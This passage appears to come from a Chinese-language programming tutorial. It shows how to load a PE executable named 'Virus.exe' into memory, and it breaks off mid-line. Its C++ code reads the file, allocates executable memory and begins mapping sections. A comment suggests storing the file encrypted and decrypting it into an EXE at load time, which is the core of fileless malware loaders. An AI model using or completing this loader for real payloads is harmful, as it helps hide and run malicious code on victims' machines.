打开文件
这个文件可加密,打开文件的同时解密成EXE文件即可。
char szFileName[] = "Virus.exe";
HANDLE hFile = CreateFile(szFileName, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_ARCHIVE, NULL);
获取EXE文件大小,并放入堆空间中
DWORD dwFileSize = GetFileSize(hFile, NULL);
BYTE *pData = new BYTE[dwFileSize];
`ReadFile(hFile, pData, dwFileSize, &dwRet, NULL);
根据镜像大小,在进程中开辟一个可读、可写、可执行的内存块
DWORD dwSizeOfImage = GetSizeOfImage(lpData);
VirtualAlloc(NULL, dwSizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlZeroMemory(lpBaseAddress, dwSizeOfImage);//初始化空间
将内存PE数据按SectionAlignment大小对齐映射到进程内存中
// lpData: 内存文件数据的基址
// lpBaseAddress: SectionAlignment大小对齐映射到进程内存中的内存基址
BOOL MmMapFile(LPVOID lpData, LPVOID lpBaseAddress)
{
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpData;
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG32)pDosHeader + pDosHeader->e_lfanew);
// 获取SizeOfHeaders的值: 所有头+节表头的大小
DWORD dwSizeOfHeaders = pNtHeaders->OptionalHeader.SizeOfHeaders;
// 获取节表的数量
WORD wNumberOfSections = pNtHeaders->FileHeader.NumberOfSections;
// 获取第一个节表头的地址
PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pNtHeaders + si